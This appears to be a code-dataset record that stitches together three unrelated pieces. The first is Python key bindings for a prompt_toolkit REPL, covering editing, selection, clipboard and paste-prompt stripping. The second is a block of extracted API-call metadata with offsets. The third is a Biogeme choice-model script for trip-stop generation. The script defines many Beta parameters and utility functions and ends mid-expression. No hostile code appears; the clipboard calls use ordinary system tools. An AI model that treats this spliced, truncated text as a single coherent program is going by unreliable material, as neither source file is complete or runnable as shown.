@r.add_binding(Keys.Tab, filter=tab_should_insert_whitespace) def indent(event): """ When tab should insert whitespace, do that instead of completion. """ # Text before cursor on the line must be whitespace because of the # TabShouldInsertWhitespaceFilter. before_cursor = event.app.current_buffer.document.current_line_before_cursor event.app.current_buffer.insert_text(' '*(4 - len(before_cursor)%4)) LEADING_WHITESPACE = re.compile(r'( *)[^ ]?') @r.add_binding(Keys.Escape, 'm') def back_to_indentation(event): """ Move back to the beginning of the line, ignoring whitespace. 
""" current_line = event.app.current_buffer.document.current_line before_cursor = event.app.current_buffer.document.current_line_before_cursor indent = LEADING_WHITESPACE.search(current_line) if indent: event.app.current_buffer.cursor_position -= len(before_cursor) - indent.end(1) @r.add_binding(Keys.Backspace, save_before=if_no_repeat) def delete_char_or_unindent(event): buffer = event.app.current_buffer if buffer.document.current_line_before_cursor.isspace(): spaces = len(buffer.document.current_line_before_cursor) # Delete up to the tab stop buffer.delete_before_cursor(count=4 + spaces%-4) else: backward_delete_char(event) # Reset the history search text buffer.history_search_text = None @r.add_binding(Keys.Escape, ' ') def cycle_spacing(event): """ Based on emacs's cycle-spacing On first call, remove all whitespace (if any) from around the cursor and replace it with a single space. On second call, remove all whitespace. On third call, restore the original whitespace and cursor position. """ buffer = event.app.current_buffer # Avoid issues when text grows or shrinks below, keeping the cursor # position out of sync cursor_position = buffer.cursor_position buffer.cursor_position = 0 buffer.text, buffer.cursor_position = do_cycle_spacing(buffer.text, cursor_position) def do_cycle_spacing(text, cursor_position, state=[]): rstripped = text[:cursor_position].rstrip() lstripped = text[cursor_position:].lstrip() text_before_cursor = text[:cursor_position] # The first element of state is the original text. The last element is the # buffer text and cursor position as we last left them. If either of those # have changed, reset. The state here is global, but that's fine, because # we consider any change to be enough clear the state. The worst that # happens here is that we resume when we shouldn't if things look exactly # as they did where we left off. # TODO: Use event.previous_key_sequence instead. if state and state[-1] != (text, cursor_position): state.clear() if len(state) == 0: # Replace all whitespace at the cursor (if any) with a single space. state.append((text, cursor_position)) cursor_position -= len(text_before_cursor) - len(rstripped) -1 text = rstripped + ' ' + lstripped state.append((text, cursor_position)) elif len(state) == 2: # Exactly one space at the cursor. Remove it. cursor_position -= 1 text = rstripped + lstripped state.append((text, cursor_position)) elif len(state) == 3: # Restore original text and cursor position text, cursor_position = state[0] state.clear() if cursor_position < 0: cursor_position = 0 if cursor_position > len(text): cursor_position = len(text) return text, cursor_position @r.add_binding(Keys.ControlX, Keys.ControlO) def delete_blank_lines(event): """ On blank line, delete all surrounding blank lines, leaving just one. On isolated blank line, delete that one. On nonblank line, delete any immediately following blank lines. 
""" buffer = event.app.current_buffer document = buffer.document lines_up_to_current = document.lines[:document.cursor_position_row+1] lines_after_current = document.lines[document.cursor_position_row+1:] blank_lines_before = 0 for line in lines_up_to_current[::-1]: if not line.strip(): blank_lines_before += 1 else: break blank_lines_after = 0 for line in lines_after_current: if not line.strip(): blank_lines_after += 1 else: break if not blank_lines_before: stripped_before = lines_up_to_current else: stripped_before = lines_up_to_current[:-blank_lines_before] stripped_after = lines_after_current[blank_lines_after:] # XXX: Emacs always keeps a newline at the end of the file, but I don't # think it matters here. if (not blank_lines_before and blank_lines_after) or blank_lines_before + blank_lines_after == 1: new_text = '\n'.join(stripped_before + stripped_after) elif blank_lines_before + blank_lines_after == 0: return else: buffer.cursor_up(max(blank_lines_before-1, 0)) new_text = '\n'.join(stripped_before + [''] + stripped_after) # Even though we do auto_up, it can be out of bounds from trailing # whitespace buffer.cursor_position = min(buffer.cursor_position, len(new_text)) buffer.text = new_text @r.add_binding(Keys.ControlX, Keys.ControlT) def transpose_lines(event): buffer = event.current_buffer document = buffer.document row = document.cursor_position_row new_lines = document.lines[:] if len(new_lines) == 1: new_lines.append('') if row == 0: buffer.cursor_down() row += 1 if row == len(new_lines) - 1: new_lines.append('') new_lines[row], new_lines[row-1] = new_lines[row-1], new_lines[row] buffer.text = '\n'.join(new_lines) buffer.cursor_down() beginning_of_line(event) # Selection stuff @r.add_binding(Keys.ShiftLeft) def select_left(event): buffer = event.current_buffer if buffer.document.text_before_cursor: if not buffer.selection_state: buffer.start_selection() buffer.selection_state.shift_arrow = True buffer.cursor_position -= event.arg @r.add_binding(Keys.ShiftRight) def select_right(event): buffer = event.current_buffer if buffer.document.text_after_cursor: if not buffer.selection_state: buffer.start_selection() buffer.selection_state.shift_arrow = True buffer.cursor_position += event.arg @r.add_binding(Keys.Up) def auto_up(event): buffer = event.current_buffer count = event.arg if buffer.document.cursor_position_row > 0: buffer.cursor_up(count=count) elif not buffer.selection_state: event.key_sequence[-1].accept_next = True buffer.history_backward(count=count) if getattr(buffer.selection_state, "shift_arrow", False): buffer.selection_state = None @r.add_binding(Keys.Down) def auto_down(event): buffer = event.current_buffer count = event.arg if buffer.document.cursor_position_row < buffer.document.line_count - 1: buffer.cursor_down(count=count) elif not buffer.selection_state: buffer.history_forward(count=count) if getattr(buffer.selection_state, "shift_arrow", False): buffer.selection_state = None @r.add_binding(Keys.ShiftUp) def select_line_up(event): buffer = event.current_buffer if buffer.document.text_before_cursor: if not buffer.selection_state: buffer.start_selection() buffer.selection_state.shift_arrow = True up_position = buffer.document.get_cursor_up_position() buffer.cursor_position += up_position if not up_position: buffer.cursor_position = 0 @r.add_binding(Keys.ShiftDown) def select_line_down(event): buffer = event.current_buffer if buffer.document.text_after_cursor: if not buffer.selection_state: buffer.start_selection() buffer.selection_state.shift_arrow = True 
down_position = buffer.document.get_cursor_down_position() buffer.cursor_position += down_position if not down_position: buffer.cursor_position = len(buffer.document.text) # The default doesn't toggle correctly @r.add_binding(Keys.ControlSpace) def toggle_selection(event): buffer = event.current_buffer if buffer.selection_state: buffer.selection_state = None else: buffer.start_selection() @r.add_binding(Keys.ControlX, 'h') def select_all(event): buffer = event.current_buffer buffer.selection_state = SelectionState(len(buffer.document.text)) buffer.cursor_position = 0 @r.add_binding(Keys.Delete, filter=HasSelection()) @r.add_binding(Keys.Backspace, filter=HasSelection()) def delete_selection(event): event.current_buffer.cut_selection() @r.add_binding(Keys.Any, filter=HasSelection()) def self_insert_and_clear_selection(event): event.current_buffer.cut_selection() self_insert(event) @r.add_binding(Keys.ControlK, filter=HasSelection()) @r.add_binding(Keys.ControlU, filter=HasSelection()) def kill_selection(event): data = event.current_buffer.cut_selection() event.app.clipboard.set_data(data) def system_copy(text): if "Linux" in platform.platform(): copy_command = ['xclip', '-selection', 'c'] else: copy_command = ['pbcopy'] try: # In Python 3.6 we can do this: # run(copy_command, input=text, encoding='utf-8', check=True) subprocess.run(copy_command, input=text.encode('utf-8'), check=True) except FileNotFoundError: print("Error: could not find", copy_command[0], file=sys.stderr) except subprocess.CalledProcessError as e: print(copy_command[0], "error:", e, file=sys.stderr) def system_paste(): if "Linux" in platform.platform(): paste_command = ['xsel', '-b'] else: paste_command = ['pbpaste'] try: # In Python 3.6 we can do this: # run(paste_command, input=text, encoding='utf-8') p = subprocess.run(paste_command, stdout=subprocess.PIPE, check=True) except FileNotFoundError: print("Error: could not find", paste_command[0], file=sys.stderr) except subprocess.CalledProcessError as e: print(paste_command[0], "error:", e, file=sys.stderr) return p.stdout.decode('utf-8') @r.add_binding(Keys.ControlX, Keys.ControlW) def copy_to_clipboard(event): if event.current_buffer.document.selection: from_, to = event.current_buffer.document.selection_range() run_in_terminal(lambda:system_copy(event.current_buffer.document.text[from_:to + 1])) @r.add_binding(Keys.ControlX, Keys.ControlY) def paste_from_clipboard(event): paste_text_future = run_in_terminal(system_paste) event.current_buffer.cut_selection() paste_text_future.add_done_callback(lambda future:\ event.current_buffer.paste_clipboard_data(ClipboardData(future.result()))) # M-[ a b is set to C-S-/ (C-?) in iTerm2 settings Keys.ControlQuestionmark = "<C-?>" ALL_KEYS.append("<C-?>") ANSI_SEQUENCES['\x1b[ab'] = Keys.ControlQuestionmark Keys.ControlSlash = "<C-/>" ALL_KEYS.append("<C-/>") ANSI_SEQUENCES['\x1b"5/'] = Keys.ControlSlash # This won't work until # https://github.com/jonathanslenders/python-prompt-toolkit/pull/484 is # merged. 
if prompt_toolkit_version[0] != '3': @r.add_binding(Keys.ControlQuestionmark, save_before=lambda e: False) def redo(event): event.current_buffer.redo() @r.add_binding(Keys.ControlSlash, save_before=lambda e: False) def undo(event): event.current_buffer.undo() # Need to escape all spaces here because of verbose (x) option below ps1_prompts = [r'>>>\ '] + [re.escape(i) + r'\[\d+\]:\ ' for i, j in emoji + [emoji_pudb]] + [r'In\ \[\d+\]:\ '] ps2_prompts = [r'\ *\.\.\.:\ ?', r'\.\.\.\ ?', '\N{CLAPPING HANDS SIGN}+\\ ?⎢\\ ?'] PS1_PROMPTS_RE = re.compile('|'.join(ps1_prompts)) PS2_PROMPTS_RE = re.compile('|'.join(ps2_prompts)) PROMPTED_TEXT_RE = re.compile(r'''(?x) # Multiline and verbose (?P<prompt> (?P<ps1prompt>{PS1_PROMPTS_RE.pattern}) # Match prompts at the front | (?P<ps2prompt>{PS2_PROMPTS_RE.pattern}))? # of the line. (?P<noprompt>(?(prompt)\r|))? # If the prompt is not # matched, this is a special # marker group that will match # the empty string. # Otherwise it will not # match (because all \r's # have been stripped from # the string). (?P<line>.*)\n # The actual line. '''.format(PS1_PROMPTS_RE=PS1_PROMPTS_RE, PS2_PROMPTS_RE=PS2_PROMPTS_RE)) def prompt_repl(match): r""" repl function for re.sub for clearing prompts Replaces PS1 prompts with \r and removes PS2 prompts. """ # TODO: Remove the lines with no prompt if match.group('ps1prompt') is not None: return '\r' + match.group('line') + '\n' elif match.group('ps2prompt') is not None: return match.group('line') + '\n' return '' def split_prompts(text, indent=''): r""" Takes text copied from mypython, Python, or IPython session and returns a list of inputs Outputs are stripped. If no prompts are found the text is left alone. The resulting text is indented by indent, except for the first line. It is assumed that the text contains no carriage returns (\r). Trailing whitespace and newlines is stripped from the outputs. Example: >>> split_prompts(''' ... In [1]: a = 1 ... ... In [2]: a ... Out[2]: 1 ... ... In [3]: def test(): ... ...: pass ... ...: ... ''') ['a = 1', 'a', 'def test():\n pass'] """ from .mypython import validate_text text = textwrap.dedent(text).strip() + '\n' text = textwrap.dedent(PROMPTED_TEXT_RE.sub(prompt_repl, text)).lstrip() lines = text.split('\r') # Make sure multilines end in two newlines for i, line in enumerate(lines): try: validate_text(line) except SyntaxError: # If there is a syntax error, we can't use the CMD_QUEUE (it # breaks things). lines = ['\n'.join(lines)] break if '\n' in line.rstrip(): lines[i] += '\n' lines[0] = textwrap.indent(lines[0], indent, # Don't indent the first line, it's already indented lambda line, _x=[]: bool(_x or _x.append(1))) for i in range(1, len(lines)): lines[i] = textwrap.indent(lines[i], indent) # Extraneous newlines at the end will be stripped by the prompt anyway. # This just makes this function easier to test. lines = [i.rstrip() for i in lines] return lines @r.add_binding(Keys.BracketedPaste) def bracketed_paste(event): from .mypython import CMD_QUEUE data = event.data buffer = event.current_buffer # Be sure to use \n as line ending. # This part is the same as the default binding # Some terminals (Like iTerm2) seem to paste \r\n line endings in a # bracketed paste. 
See: https://github.com/ipython/ipython/issues/9737 data = data.replace('\r\n', '\n') data = data.replace('\r', '\n') # Replace tabs with four spaces (C-x C-y will still paste the text exactly) data = data.replace('\t', ' ') # Strip prompts off pasted text document = buffer.document row, col = document.translate_index_to_position(buffer.cursor_position) row += 1 if not inside_string(event.current_buffer.text, row, col): indent = LEADING_WHITESPACE.match(document.current_line_before_cursor) current_line_indent = indent.group(1) if indent else '' if PS1_PROMPTS_RE.match(data.strip()) or PS2_PROMPTS_RE.match(data.strip()): lines = split_prompts(data, current_line_indent) else: lines = [textwrap.indent(data, current_line_indent, # Don't indent the first line, it's already indented lambda line, _x=[]: bool(_x or _x.append(1)))] else: lines = [data] event.current_buffer.insert_text(lines[0]) for text in lines[1:]: # TODO: Send last chunk as bracketed paste, so it can be edited CMD_QUEUE.append(text) if CMD_QUEUE: accept_line(event) @r.add_binding(Keys.Escape, ';') def comment(event): buffer = event.current_buffer document = buffer.document cursor_line, cursor_col = document.translate_index_to_position(document.cursor_position) if document.selection: from_, to = document.selection_range() start_line, start_col = document.translate_index_to_position(from_) end_line, end_col = document.translate_index_to_position(to - 1) end_line += 1 else: start_line = cursor_line end_line = start_line + 1 # Get the indentation for the comment delimiters min_indent = float('inf') for line in document.lines[start_line:end_line]: if not line.strip(): continue indent = LEADING_WHITESPACE.search(line) if indent: min_indent = min(min_indent, len(indent.group(1))) else: min_indent = 0 if min_indent == 0: break if min_indent == float('inf'): min_indent = 0 uncomment = (all(not line.strip() or line[min_indent] == '#' for line in document.lines[start_line:end_line]) and ''.join(document.lines[start_line:end_line]).strip()) lines = [] for i, line in enumerate(document.lines): if start_line <= i < end_line: if uncomment: lines.append(line[:min_indent] + line[min_indent+2:]) else: lines.append(line[:min_indent] + '# ' + line[min_indent:]) else: lines.append(line) new_text = '\n'.join(lines) # TODO: Set the cursor position correctly n_changed = 2*(cursor_line - start_line + 1) if cursor_line >= end_line - 1: n_changed -= 2 if uncomment: buffer.cursor_position -= n_changed buffer.text = new_text else: buffer.text = new_text buffer.cursor_position += n_changed @r.add_binding(Keys.ControlX, Keys.ControlE) def open_in_editor(event): event.current_buffer.open_in_editor(event.app) @r.add_binding(Keys.ControlX, Keys.ControlS) @r.add_binding(Keys.ControlX, Keys.ControlC) def noop(event): pass
[((1867, 1880), 'prompt_toolkit.key_binding.KeyBindings', 'KeyBindings', ([], {}), '()\n', (1878, 1880), False, 'from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings\n'), ((4468, 4497), 're.compile', 're.compile', (['"""\\\\S *(\\\\n *\\\\n)"""'], {}), "('\\\\S *(\\\\n *\\\\n)')\n", (4478, 4497), False, 'import re\n'), ((5391, 5447), 're.compile', 're.compile', (['"""([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)"""'], {}), "('([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)')\n", (5401, 5447), False, 'import re\n'), ((13992, 14024), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<Shift-Enter>"""'], {}), "('<Shift-Enter>')\n", (14007, 14024), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((14652, 14675), 're.compile', 're.compile', (['"""( *)[^ ]?"""'], {}), "('( *)[^ ]?')\n", (14662, 14675), False, 'import re\n'), ((25290, 25314), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<C-?>"""'], {}), "('<C-?>')\n", (25305, 25314), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((25397, 25421), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<C-/>"""'], {}), "('<C-/>')\n", (25412, 25421), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((20051, 20075), 'prompt_toolkit.key_binding.bindings.named_commands.beginning_of_line', 'beginning_of_line', (['event'], {}), '(event)\n', (20068, 20075), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((23213, 23231), 'prompt_toolkit.key_binding.bindings.named_commands.self_insert', 'self_insert', (['event'], {}), '(event)\n', (23224, 23231), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((24992, 25021), 'prompt_toolkit.application.run_in_terminal', 'run_in_terminal', (['system_paste'], {}), '(system_paste)\n', (25007, 25021), False, 'from prompt_toolkit.application import run_in_terminal\n'), ((13556, 13574), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (13567, 13574), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((15494, 15521), 'prompt_toolkit.key_binding.bindings.named_commands.backward_delete_char', 'backward_delete_char', (['event'], {}), '(event)\n', (15514, 15521), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((22935, 22949), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (22947, 22949), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((22989, 23003), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23001, 23003), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23108, 23122), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23120, 23122), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23270, 23284), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23282, 23284), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23323, 23337), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23335, 23337), False, 'from prompt_toolkit.filters import 
Condition, HasSelection, is_searching\n'), ((23495, 23514), 'platform.platform', 'platform.platform', ([], {}), '()\n', (23512, 23514), False, 'import platform\n'), ((24059, 24078), 'platform.platform', 'platform.platform', ([], {}), '()\n', (24076, 24078), False, 'import platform\n'), ((24286, 24351), 'subprocess.run', 'subprocess.run', (['paste_command'], {'stdout': 'subprocess.PIPE', 'check': '(True)'}), '(paste_command, stdout=subprocess.PIPE, check=True)\n', (24300, 24351), False, 'import subprocess\n'), ((29068, 29101), 'textwrap.indent', 'textwrap.indent', (['lines[i]', 'indent'], {}), '(lines[i], indent)\n', (29083, 29101), False, 'import textwrap\n'), ((30835, 30853), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (30846, 30853), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((1601, 1622), 'prompt_toolkit.key_binding.bindings.basic.load_basic_bindings', 'load_basic_bindings', ([], {}), '()\n', (1620, 1622), False, 'from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings\n'), ((1633, 1654), 'prompt_toolkit.key_binding.bindings.emacs.load_emacs_bindings', 'load_emacs_bindings', ([], {}), '()\n', (1652, 1654), False, 'from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings\n'), ((1664, 1692), 'prompt_toolkit.key_binding.bindings.emacs.load_emacs_search_bindings', 'load_emacs_search_bindings', ([], {}), '()\n', (1690, 1692), False, 'from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings\n'), ((1702, 1739), 'prompt_toolkit.key_binding.bindings.page_navigation.load_emacs_page_navigation_bindings', 'load_emacs_page_navigation_bindings', ([], {}), '()\n', (1737, 1739), False, 'from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings\n'), ((1750, 1771), 'prompt_toolkit.key_binding.bindings.mouse.load_mouse_bindings', 'load_mouse_bindings', ([], {}), '()\n', (1769, 1771), False, 'from prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings\n'), ((1781, 1800), 'prompt_toolkit.key_binding.bindings.cpr.load_cpr_bindings', 'load_cpr_bindings', ([], {}), '()\n', (1798, 1800), False, 'from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings\n'), ((12687, 12705), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (12698, 12705), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((12873, 12891), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (12884, 12891), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((11679, 11688), 'prompt_toolkit.application.current.get_app', 'get_app', ([], {}), '()\n', (11686, 11688), False, 'from prompt_toolkit.application.current import get_app\n'), ((25967, 25979), 're.escape', 're.escape', (['i'], {}), '(i)\n', (25976, 25979), False, 'import re\n'), ((28323, 28344), 'textwrap.dedent', 'textwrap.dedent', (['text'], {}), '(text)\n', (28338, 28344), False, 'import textwrap\n')]
gusugusu1018/simmobility-prod
demand/preday_model_estimation/isg.py
d30a5ba353673f8fd35f4868c26994a0206a40b6
from biogeme import * from headers import * from loglikelihood import * from statistics import * from nested import * #import random cons_work= Beta('cons for work', 0,-10,10,0) cons_edu = Beta('cons for education',0,-50,10,0) cons_shopping = Beta('cons for shopping',0,-10,10,0) cons_other = Beta('cons for other',0,-10,10,0) cons_Q = Beta('cons for quit',0,-10,10,1) first_stop_inbound= Beta('dummy for first stop of inbound half tour', 0,-10,10,1) second_stop_inbound= Beta('dummy for second stop of inbound half tour',0,-10,10,0) threeplus_stop_inbound=Beta('dummy for 3+ stop of inbound half tour',0,-10,10,0) first_stop_outbound= Beta('dummy for first stop of outbound half tour', 0,-10,10,0) second_stop_outbound= Beta('dummy for second stop of outbound half tour',0,-10,10,0) threeplus_stop_outbound=Beta('dummy for 3+ stop of outbound half tour',0,-10,10,0) work_tour_dummy_Q=Beta('work tour dummy in quit',0,-10,10,1) edu_tour_dummy_Q=Beta('edu tour dummy in quit',0,-10,10,1) shopping_tour_dummy_Q=Beta('shopping tour dummy in quit',0,-10,10,1) other_tour_dummy_Q=Beta('other tour dummy in quit',0,-10,10,1) first_tour_dummy_Q=Beta('first tour dummy in quit',0,-10,10,0) sub_tour_dummy_Q=Beta('has subtour dummy in quit',0,-10,10,0) zero_tour_remain_Q=Beta('zero tour remain dummy',0,-10,10,1) one_tour_remain_Q=Beta('one tour remain dummy',0,-10,10,0) twoplus_tour_remain_Q=Beta('2+ tour remain dummy',0,-10,10,1) work_tour_dummy_W=Beta('work tour dummy in work',0,-10,10,1) edu_tour_dummy_W=Beta('edu tour dummy in work',0,-10,10,1) shopping_tour_dummy_W=Beta('shopping tour dummy in work',0,-10,10,1) other_tour_dummy_W=Beta('other tour dummy in work',0,-10,10,1) female_dummy_W=Beta('female dummy in work',0,-10,10,0) student_dummy_W=Beta('student dummy in work',0,-10,10,1) worker_dummy_W=Beta('worker dummy in work',0,-10,10,1) driver_dummy_W=Beta('driver dummy in work',0,-10,10,0) passenger_dummy_W=Beta('passenger dummy in work',0,-10,10,0) public_dummy_W=Beta('PT dummy in work',0,-10,10,0) work_tour_dummy_E=Beta('work tour dummy in edu',0,-10,10,1) edu_tour_dummy_E=Beta('edu tour dummy in edu',0,-10,10,1) shopping_tour_dummy_E=Beta('shopping tour dummy in edu',0,-10,10,1) other_tour_dummy_E=Beta('other tour dummy in edu',0,-10,10,1) female_dummy_E=Beta('female dummy in edu',0,-10,10,0) student_dummy_E=Beta('student dummy in edu',0,-10,10,1) worker_dummy_E=Beta('worker dummy in edu',0,-10,10,1) driver_dummy_E=Beta('driver dummy in edu',0,-10,10,0) passenger_dummy_E=Beta('passenger dummy in edu',0,-10,10,0) public_dummy_E=Beta('PT dummy in edu',0,-10,10,0) work_tour_dummy_S=Beta('work tour dummy in shopping',0,-10,10,1) edu_tour_dummy_S=Beta('edu tour dummy in shopping',0,-10,10,1) shopping_tour_dummy_S=Beta('shopping tour dummy in shopping',0,-10,10,1) other_tour_dummy_S=Beta('other tour dummy in shopping',0,-10,10,0) female_dummy_S=Beta('female dummy in shopping',0,-10,10,0) student_dummy_S=Beta('student dummy in shopping',0,-10,10,1) worker_dummy_S=Beta('worker dummy in shopping',0,-10,10,0) driver_dummy_S=Beta('driver dummy in shopping',0,-10,10,0) passenger_dummy_S=Beta('passenger dummy in shopping',0,-10,10,0) public_dummy_S=Beta('PT dummy in shopping',0,-10,10,0) work_tour_dummy_O=Beta('work tour dummy in other',0,-10,10,0) edu_tour_dummy_O=Beta('edu tour dummy in other',0,-10,10,0) shopping_tour_dummy_O=Beta('shopping tour dummy in other',0,-10,10,0) other_tour_dummy_O=Beta('other tour dummy in other',0,-10,10,1) female_dummy_O=Beta('female dummy in other',0,-10,10,0) 
student_dummy_O=Beta('student dummy in other',0,-10,10,0) worker_dummy_O=Beta('worker dummy in other',0,-10,10,0) driver_dummy_O=Beta('driver dummy in other',0,-10,10,0) passenger_dummy_O=Beta('passenger dummy in other',0,-10,10,0) public_dummy_O=Beta('PT dummy in other',0,-10,10,0) work_logsum=Beta('work logsum in work',0,-10,10,1) edu_logsum=Beta('edu logsum in edu',0,-10,10,1) shop_logsum=Beta('shop logsum in shop',0,-10,10,1) other_logsum=Beta('other logsum in other',0,-10,10,1) time_window_work=Beta('time available in work',0,-10,10,1) time_window_edu= Beta('time available in edu',0,-10,10,1) time_window_shopping= Beta('time available in shopping',0,-10,10,1) time_window_other= Beta('time available in other',0,-10,10,1) tour_distance_work= Beta('log tour distance in work',0,-10,10,0) tour_distance_edu= Beta('log tour distance in edu',0,-10,10,0) tour_distance_shopping= Beta('log tour distance in shopping',0,-10,10,0) tour_distance_other=Beta('log tour distance in other',0,-10,10,0) a700_a930_work= Beta('period 7am to 9:30am in work',0,-10,10,0) a930_a1200_work=Beta('period 9:30am to 12pm in work',0,-10,10,0) p300_p530_work=Beta('period 3pm to 5:30pm in work',0,-10,10,0) p530_p730_work=Beta('period 5:30pm to 7:30 pm in work',0,-10,10,0) p730_p1000_work=Beta('period 7:30pm to 10pm in work',0,-10,10,0) p1000_a700_work=Beta('period 10pm to 7am in work',0,-10,10,0) a700_a930_edu= Beta('period 7am to 9:30am in edu',0,-10,10,0) a930_a1200_edu=Beta('period 9:30am to 12pm in edu',0,-10,10,0) p300_p530_edu=Beta('period 3pm to 5:30pm in edu',0,-10,10,0) p530_p730_edu=Beta('period 5:30pm to 7:30 pm in edu',0,-10,10,0) p730_p1000_edu=Beta('period 7:30pm to 10pm in edu',0,-10,10,0) p1000_a700_edu=Beta('period 10pm to 7am in edu',0,-10,10,0) a700_a930_shopping= Beta('period 7am to 9:30am in shopping',0,-10,10,0) a930_a1200_shopping=Beta('period 9:30am to 12pm in shopping',0,-10,10,0) p300_p530_shopping=Beta('period 3pm to 5:30pm in shopping',0,-10,10,0) p530_p730_shopping=Beta('period 5:30pm to 7:30 pm in shopping',0,-10,10,0) p730_p1000_shopping=Beta('period 7:30pm to 10pm in shopping',0,-10,10,0) p1000_a700_shopping=Beta('period 10pm to 7am in shopping',0,-10,10,0) a700_a930_other= Beta('period 7am to 9:30am in other',0,-10,10,0) a930_a1200_other=Beta('period 9:30am to 12pm in other',0,-10,10,0) p300_p530_other=Beta('period 3pm to 5:30pm in other',0,-10,10,0) p530_p730_other=Beta('period 5:30pm to 7:30 pm in other',0,-10,10,0) p730_p1000_other=Beta('period 7:30pm to 10pm in other',0,-10,10,0) p1000_a700_other=Beta('period 10pm to 7am in other',0,-10,10,0) MU1 = Beta('MU for quit',1,0,100,1) MU2 = Beta('MU for non-quit', 1.0,0,100,1) #V for work V_work= cons_work+\ work_tour_dummy_W*1*(tour_type==1)+\ edu_tour_dummy_W*1*(tour_type==2)+\ shopping_tour_dummy_W*1*(tour_type==3)+\ other_tour_dummy_W*1*(tour_type==4)+\ female_dummy_W*female_dummy+\ student_dummy_W*student_dummy+\ worker_dummy_W*worker_dummy+\ driver_dummy_W*driver_dummy+\ passenger_dummy_W*passenger_dummy+\ public_dummy_W*public_dummy+\ work_logsum * worklogsum+\ time_window_work*time_window_h+\ tour_distance_work*log(1+distance)+\ a700_a930_work*p_700a_930a+\ a930_a1200_work*p_930a_1200a+\ p300_p530_work*p_300p_530p+\ p530_p730_work*p_530p_730p+\ p730_p1000_work*p_730p_1000p+\ p1000_a700_work*p_1000p_700a #V for education V_edu = cons_edu+\ work_tour_dummy_E*1*(tour_type==1)+\ edu_tour_dummy_E*1*(tour_type==2)+\ shopping_tour_dummy_E*1*(tour_type==3)+\ other_tour_dummy_E*1*(tour_type==4)+\ female_dummy_E*female_dummy+\ 
student_dummy_E*student_dummy+\ worker_dummy_E*worker_dummy+\ driver_dummy_E*driver_dummy+\ passenger_dummy_E*passenger_dummy+\ public_dummy_E*public_dummy+\ edu_logsum * edulogsum+\ time_window_edu*time_window_h+\ tour_distance_edu*log(1+distance)+\ a700_a930_edu*p_700a_930a+\ a930_a1200_edu*p_930a_1200a+\ p300_p530_edu*p_300p_530p+\ p530_p730_edu*p_530p_730p+\ p730_p1000_edu*p_730p_1000p+\ p1000_a700_edu*p_1000p_700a #V for shopping V_shopping = cons_shopping+\ work_tour_dummy_S*1*(tour_type==1)+\ edu_tour_dummy_S*1*(tour_type==2)+\ shopping_tour_dummy_S*1*(tour_type==3)+\ other_tour_dummy_S*1*(tour_type==4)+\ female_dummy_S*female_dummy+\ student_dummy_S*student_dummy+\ worker_dummy_S*worker_dummy+\ driver_dummy_S*driver_dummy+\ passenger_dummy_S*passenger_dummy+\ public_dummy_S*public_dummy+\ shop_logsum * shoplogsum+\ time_window_shopping*time_window_h+\ tour_distance_shopping*log(1+distance)+\ a700_a930_shopping*p_700a_930a+\ a930_a1200_shopping*p_930a_1200a+\ p300_p530_shopping*p_300p_530p+\ p530_p730_shopping*p_530p_730p+\ p730_p1000_shopping*p_730p_1000p+\ p1000_a700_shopping*p_1000p_700a #V for other V_other=cons_other+\ work_tour_dummy_O*1*(tour_type==1)+\ edu_tour_dummy_O*1*(tour_type==2)+\ shopping_tour_dummy_O*1*(tour_type==3)+\ other_tour_dummy_O*1*(tour_type==4)+\ female_dummy_O*female_dummy+\ student_dummy_O*student_dummy+\ worker_dummy_O*worker_dummy+\ driver_dummy_O*driver_dummy+\ passenger_dummy_O*passenger_dummy+\ public_dummy_O*public_dummy+\ other_logsum * otherlogsum+\ time_window_other*time_window_h+\ tour_distance_other*log(1+distance)+\ a700_a930_other*p_700a_930a+\ a930_a1200_other*p_930a_1200a+\ p300_p530_other*p_300p_530p+\ p530_p730_other*p_530p_730p+\ 